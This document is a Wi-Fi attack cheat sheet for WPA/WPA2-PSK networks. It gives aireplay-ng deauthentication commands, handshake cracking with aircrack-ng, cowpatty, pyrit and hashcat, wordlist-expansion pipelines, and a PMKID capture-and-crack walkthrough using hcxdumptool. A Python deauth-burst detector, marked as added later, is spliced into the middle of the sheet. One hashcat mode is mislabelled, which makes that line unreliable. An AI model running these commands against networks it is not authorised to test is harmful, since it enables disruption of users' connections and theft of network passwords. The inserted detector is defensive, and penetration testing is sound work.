WPA/WPA2

WPA/WPA2 PSK

Deauthenticate a supplicant
aireplay-ng -0 20 -a <ap_mac> -c <supplicant_mac> <wlan1mon>

1. Deauthenticating with the broadcast address can be very efficient and convenient
2. airodump-ng should then show “WPA handshake”
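A defender-side companion to the deauth step above, added here and not part of the original cheat sheet: it parses raw 802.11 management frames (assumed to carry no radiotap header) and flags any BSSID that sources a burst of deauthentication/disassociation frames, which is what an `aireplay-ng -0 20` run looks like to a wireless IDS. The sample frames are constructed inline; the MAC addresses and threshold are arbitrary.

```python
import struct
from collections import Counter

MGMT_DEAUTH, MGMT_DISASSOC = 0x0C, 0x0A   # 802.11 management subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"

def _mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_mgmt(frame):
    """Parse a raw 802.11 management frame (no radiotap). None for other frame types."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if fc0 & 0x0C:                      # frame-control bits 2-3 = type; 0 is management
        return None
    rec = {"subtype": fc0 >> 4, "da": _mac(frame[4:10]),
           "sa": _mac(frame[10:16]), "bssid": _mac(frame[16:22])}
    if rec["subtype"] in (MGMT_DEAUTH, MGMT_DISASSOC) and len(frame) >= 26:
        rec["reason"] = struct.unpack_from("<H", frame, 24)[0]   # little-endian reason code
    return rec

def detect_deauth_burst(frames, threshold=10):
    """{bssid: {"count", "broadcast"}} for BSSIDs sourcing >= threshold deauth/disassoc
    frames; "broadcast" marks the 'deauth everyone' variant (DA = ff:ff:ff:ff:ff:ff)."""
    counts, bcast = Counter(), set()
    for f in frames:
        r = parse_mgmt(f)
        if r and r["subtype"] in (MGMT_DEAUTH, MGMT_DISASSOC):
            counts[r["bssid"]] += 1
            if r["da"] == BROADCAST:
                bcast.add(r["bssid"])
    return {b: {"count": c, "broadcast": b in bcast}
            for b, c in counts.items() if c >= threshold}

# --- constructed sample traffic (demo data, not a real capture) ---
def _frame(fc0, da, sa, bssid, body=b"", seq=0):
    addrs = b"".join(bytes.fromhex(m.replace(":", "")) for m in (da, sa, bssid))
    return struct.pack("<BBH", fc0, 0, 0x013A) + addrs + struct.pack("<H", seq << 4) + body

AP, STA = "00:11:22:33:44:55", "66:77:88:99:aa:bb"                      # hypothetical addresses
SAMPLE_FRAMES = [_frame(0x80, BROADCAST, AP, AP, b"\x00" * 12)]         # one beacon
SAMPLE_FRAMES += [_frame(0xC0, BROADCAST, AP, AP, struct.pack("<H", 7), i)
                  for i in range(20)]                                   # 20 broadcast deauths, reason 7
SAMPLE_FRAMES.append(_frame(0xC0, STA, "de:ad:be:ef:00:01",
                            "de:ad:be:ef:00:01", struct.pack("<H", 3)))  # one ordinary deauth

if __name__ == "__main__":
    print(detect_deauth_burst(SAMPLE_FRAMES))  # {'00:11:22:33:44:55': {'count': 20, 'broadcast': True}}
```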

Crack

aircrack

aircrack-ng -w <dico> <cap.pcap>

Rainbow tables - cowpatty

genpmk -f <dico> -d <computed_hashes.txt> -s <essid>
cowpatty -r <cap.pcap> -d <computed_hashes.txt> -2 -s <essid>

GPU - pyrit

pyrit eval
pyrit -i <dico> import_passwords
pyrit -e <essid> create_essid
pyrit batch
pyrit -r <cap.pcap> -b <ap_mac> attack_db
rm -r ~/.pyrit/blobspace

GPU - hashcat

https://hashcat.net/cap2hccapx/
hashcat64.exe -m 2500 -r rules\best64.rule cap\capture.hccapx dict\custom_dict.txt

Enhanced wordlist

nano lower_dico.txt
sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt
/usr/lib/hashcat-utils/combinator.bin lower_dico.txt lower_dico.txt > ll_dico.txt
/usr/lib/hashcat-utils/combinator.bin lower_dico.txt upper_dico.txt > lu_dico.txt
/usr/lib/hashcat-utils/combinator.bin upper_dico.txt lower_dico.txt > ul_dico.txt
/usr/lib/hashcat-utils/combinator.bin upper_dico.txt upper_dico.txt > uu_dico.txt
cat ll_dico.txt lu_dico.txt ul_dico.txt uu_dico.txt | sort | uniq > enhanced_custom.txt
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout enhanced_custom.txt | sort | uniq > <custom_dico_best64.txt>

PMKID

It only works against APs that support roaming.

Installation
apt install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev
cd /opt
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
make install
cd /opt
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install
cd /opt
Attack

1. Traffic capture

Opportunistic attack without mac filtering

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filtermode=2 --enable_status=3

Target one or more BSSID

Put one or more BSSIDs in a file, all characters uppercase and without any separator (remove all “:”).
Example: 50D72257AC2F

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filterlist=<mac.txt> --filtermode=2 --enable_status=3
2. PCAP to hashes
hcxpcaptool -z <out.hashes> <pmkid.pcap>
3. Crack

Solution 1

hashcat mode 16800 (WPA-PMKID-PBKDF2) on <out.hashes>

Solution 2

hcxpcaptool -o <hccapx.hashes> <pmkid.pcap>

hashcat mode 2500 (WPA-PMKID-PBKDF2) on <hccapx.hashes>